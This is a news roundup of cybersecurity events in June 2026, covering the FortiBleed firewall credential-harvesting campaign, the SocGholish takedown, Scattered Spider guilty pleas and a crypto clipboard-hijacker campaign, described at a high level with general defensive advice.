FortiBleed, SocGholish, Scattered Spider: June 2026

Three major cybersecurity developments converged in the week of June 23, 2026: a credential-harvesting campaign targeting over 430,000 FortiGate firewalls, a law enforcement takedown of the SocGholish malware network, and guilty pleas from two Scattered Spider members whose group extorted at least $115 million from victims. Together, they illustrate the current scale and coordination of financially motivated cybercrime.

FortiBleed Campaign Hits 430,000 Firewalls Worldwide

A Russian initial access broker has compromised more than 430,000 FortiGate firewalls globally since at least February 2026, harvesting an estimated 110 million credentials in a campaign researchers at SOCRadar have named FortiBleed. Of the 80,000 identified targets, more than 19,000 remain actively monitored by the attackers as of this week, according to SOCRadar’s white paper published June 23.

The attackers use Masscan and Shodan to identify exposed FortiGate appliances, then break in via SSH brute-force attacks. Once inside, they deploy a custom Golang tool called FortigateSniffer, which turns the firewalls into passive credential collectors — capturing cleartext credentials and password hashes from authentication traffic passing through the device. SOCRadar told SecurityWeek that attackers then “crack what they capture, and sell that access on.”

SOCRadar’s investigation identified hundreds of servers and more than 650 credential-harvesting pipelines operating as part of the campaign. High-value confirmed targets include a NATO-aligned defense contractor. The threat is compounded by supply-chain exposure: as Dark Reading reported, managed service providers that administer Fortinet devices on behalf of clients are squarely in scope, meaning a single compromised MSP can expose dozens of downstream organizations.

Tooling comments written in the Cyrillic alphabet led SOCRadar to assess the perpetrators are likely Russian, and the group’s behavior — compromising, harvesting, and reselling access — fits the profile of a financially motivated IAB rather than a state-sponsored actor.

SocGholish Servers Seized in Operation Endgame

An international law enforcement operation seized 106 servers and numerous domains tied to SocGholish on June 18, 2026, as part of the ongoing Operation Endgame. Authorities also remediated 14,971 compromised websites, the majority hosted on WordPress, that SocGholish operators had used to distribute the malware, according to the Netherlands’ National Police Corps.

SocGholish is a JavaScript-based malware framework that has operated for nearly a decade. It injects malicious code into legitimate websites, presenting visitors with fake browser update prompts. When users install the fake update, the malware establishes a foothold that threat actors then use to deploy ransomware or conduct espionage — most notably on behalf of the Russian cybercrime group Evil Corp.

The operation also drew attention to traffic distribution systems (TDSs), a less-discussed component of the infection chain. TDSs act as routing layers that filter incoming web traffic and redirect only high-value targets — typically corporate users on Windows machines — toward the malicious payload, while sending everyone else to benign content. The FBI Cyber Division said in a post on X on June 18 that the malware “establishes an initial foothold into victim computers, collectively known as a botnet, and is then used by threat actors for further targeting with ransomware campaigns and espionage.”

In an accompanying public service announcement, the FBI warned enterprises to scrutinize unexpected browser update prompts and audit third-party JavaScript loaded by their web properties.

Scattered Spider Members Plead Guilty on Trial Day One

Two UK nationals pleaded guilty on June 23, 2026 — the first day of what had been scheduled as a six-week trial — to charges stemming from an August 2024 cyberattack that knocked out systems at Transport for London. The pair, Thalha Jubair, 20, of East London, and Owen Flowers, 18, of Walsall, are members of Scattered Spider, a loosely organized English-speaking cybercrime group that has targeted major enterprises across the US and UK.

Both admitted conspiring to commit unauthorized acts against Transport for London computer systems and causing risk of serious damage to human welfare. According to a BBC report cited by Krebs on Security, Flowers separately admitted involvement in hacking US healthcare providers SSM Health Care Corporation and Sutter Health in September 2024.

Jubair faces additional exposure in the United States. A September 2025 indictment unsealed by New Jersey prosecutors alleges he and other Scattered Spider members carried out 120 network intrusions targeting 47 US entities between May 2022 and September 2025, with victims paying a combined $115 million in ransom.

Crypto Heist Uses GitHub and YouTube as Distribution Channels

Check Point Software disclosed a separate campaign this week in which attackers built a fake reputation network — spanning GitHub repositories, SourceForge projects, and bogus YouTube videos — to distribute a Rust-based clipboard hijacker targeting cryptocurrency holders on both Windows and macOS. The campaign was reported by Dark Reading on June 22.

The malware silently replaces cryptocurrency wallet addresses copied to the clipboard with attacker-controlled addresses, redirecting transactions without the victim’s knowledge. Check Point described the primary targets as “users who are looking for shortcuts and quick profits — particularly crypto owners and online crash-game gamblers and traders who are attracted by promises of automated gains.”

The campaign is notable less for its payload than for its distribution model: rather than relying on phishing emails or exploit kits, the attackers built a surface-level credible ecosystem of open-source tools and tutorial content to pass off the malware as legitimate software.

What This Means

This week’s disclosures share a common thread: attackers are operating at infrastructure scale. FortiBleed’s 650 harvesting pipelines and SocGholish’s 14,971 compromised websites are not opportunistic — they reflect sustained, industrialized operations built to generate sellable access. The Scattered Spider guilty pleas confirm that even loosely organized groups with teenage members can sustain multi-year, nine-figure extortion campaigns.

For security teams, the FortiBleed campaign is the most operationally urgent. Any organization running internet-exposed FortiGate appliances — or using an MSP that does — should treat credential stores as potentially compromised and audit for unauthorized Active Directory changes and session cookie reuse. The SocGholish takedown removes one active threat but does not eliminate the TDS model; similar frameworks will fill the gap.

FAQ

What is FortiBleed and who is at risk?

FortiBleed is a credential-harvesting campaign targeting internet-exposed FortiGate firewalls, active since at least February 2026. Organizations running FortiGate devices directly or through managed service providers are at risk, as are their downstream clients and supply-chain partners.

What is SocGholish and how does it infect users?

SocGholish is a JavaScript malware framework that compromises legitimate websites and displays fake browser update prompts to visitors. Users who install the fake update unknowingly give attackers a foothold that is then sold to ransomware groups, most notably Evil Corp.

Who are Scattered Spider and what did they plead guilty to?

Scattered Spider is an English-speaking cybercrime group responsible for attacks on major enterprises in the US and UK. Thalha Jubair and Owen Flowers pleaded guilty on June 23, 2026 to charges related to the August 2024 attack on Transport for London; Jubair also faces a US indictment tied to 120 intrusions and $115 million in ransom payments.